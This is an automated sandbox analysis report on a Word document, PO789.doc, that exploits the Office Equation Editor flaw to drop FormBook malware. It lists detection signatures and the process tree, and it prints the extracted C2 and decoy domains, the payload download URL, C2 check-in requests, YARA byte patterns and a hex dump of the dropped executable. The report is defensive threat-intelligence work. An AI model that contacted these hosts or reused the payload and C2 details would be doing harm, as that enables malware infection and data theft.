Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO789.doc

Overview

General Information

Sample Name:PO789.doc
Analysis ID:552782
MD5:6c28e31d32e97db724188025636ac25e
SHA1:c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256:c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
Tags:docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • medicomsh78694.exe (PID: 2824 cmdline: C:\Users\user\AppData\Roaming\medicomsh78694.exe MD5: 8807C2E0F2973A22812AF6E61BA72667)
      • medicomsh78694.exe (PID: 2008 cmdline: {path} MD5: 8807C2E0F2973A22812AF6E61BA72667)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msdt.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
            • cmd.exe (PID: 448 cmdline: /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.medicomsh78694.exe.3221198.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.medicomsh78694.exe.3221198.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83e38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x841d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xabc58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0xabff2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fee5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0xb7d05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x8f9d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0xb77f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x8ffe7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0xb7e07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x9015f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb7f7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x84bea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0xaca0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x8ec4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb6a6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x85962:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0xad782:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x953d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0xbd1f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x9647a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.medicomsh78694.exe.3221198.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x92309:$sqlite3step: 68 34 1C 7B E1
        • 0x9241c:$sqlite3step: 68 34 1C 7B E1
        • 0xba129:$sqlite3step: 68 34 1C 7B E1
        • 0xba23c:$sqlite3step: 68 34 1C 7B E1
        • 0x92338:$sqlite3text: 68 38 2A 90 C5
        • 0x9245d:$sqlite3text: 68 38 2A 90 C5
        • 0xba158:$sqlite3text: 68 38 2A 90 C5
        • 0xba27d:$sqlite3text: 68 38 2A 90 C5
        • 0x9234b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x92473:$sqlite3blob: 68 53 D8 7F 8C
        • 0xba16b:$sqlite3blob: 68 53 D8 7F 8C
        • 0xba293:$sqlite3blob: 68 53 D8 7F 8C
        5.2.medicomsh78694.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.medicomsh78694.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 6 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.58.149.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\medicomsh78694.exe, NewProcessName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, OriginalFileName: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\medicomsh78694.exe, ProcessId: 2824
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2848

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO789.docVirustotal: Detection: 57%Perma Link
          Source: PO789.docReversingLabs: Detection: 53%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://peak-tv.tk/medicomzx.exeAvira URL Cloud: Label: malware
          Source: http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90iAvira URL Cloud: Label: malware
          Source: http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90iAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: peak-tv.tkVirustotal: Detection: 5%Perma Link
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeMetadefender: Detection: 34%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeReversingLabs: Detection: 51%
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMetadefender: Detection: 34%Perma Link
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeReversingLabs: Detection: 51%
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeJoe Sandbox ML: detected
          Source: 5.0.medicomsh78694.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.medicomsh78694.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.medicomsh78694.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.medicomsh78694.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drStream path '_1703602930/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
          Source: global trafficDNS query: name: peak-tv.tk
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.muzicalbox.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.13 80
          Source: C:\Windows\explorer.exeDomain query: www.extraordinarymiracle.com
          Source: C:\Windows\explorer.exeDomain query: www.realstakepool.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 109.94.209.123 80
          Source: C:\Windows\explorer.exeDomain query: www.prestigiousuniforms.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.carbonfiber.cloud/md4m/
          Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 2.58.149.41 2.58.149.41
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Jan 2022 17:17:00 GMTServer: ApacheLast-Modified: Tue, 11 Jan 2022 16:19:34 GMTETag: "aca00-5d550d19904c2"Accept-Ranges: bytesContent-Length: 707072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 